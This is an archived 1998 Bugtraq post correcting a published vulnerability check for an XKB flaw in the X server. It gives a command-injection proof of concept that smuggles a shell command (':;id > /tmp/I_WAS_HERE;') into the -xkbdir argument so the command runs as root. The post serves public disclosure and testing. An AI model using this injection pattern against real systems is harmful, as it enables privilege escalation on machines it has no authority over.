[6065] in bugtraq
serious security problem in XKB--ERRATUM
daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Wed Feb 4 10:33:02 1998
Date: Wed, 4 Feb 1998 10:39:28 +0100
Reply-To: peak@kerberos.troja.mff.cuni.cz
From: Pavel Kankovsky <peak@KERBEROS.TROJA.MFF.CUNI.CZ>
X-To: linux-security@redhat.com
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.980203191041.17555H-100000@kerberos.troja.mff.cuni.cz>
> Quick vulnerability check:
>
> $ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
> [exit X server]
> $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
This should read:
$ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'
--Pavel Kankovsky aka Peak [ Boycott Microsoft -- http://www.vcnet.com/bms ]
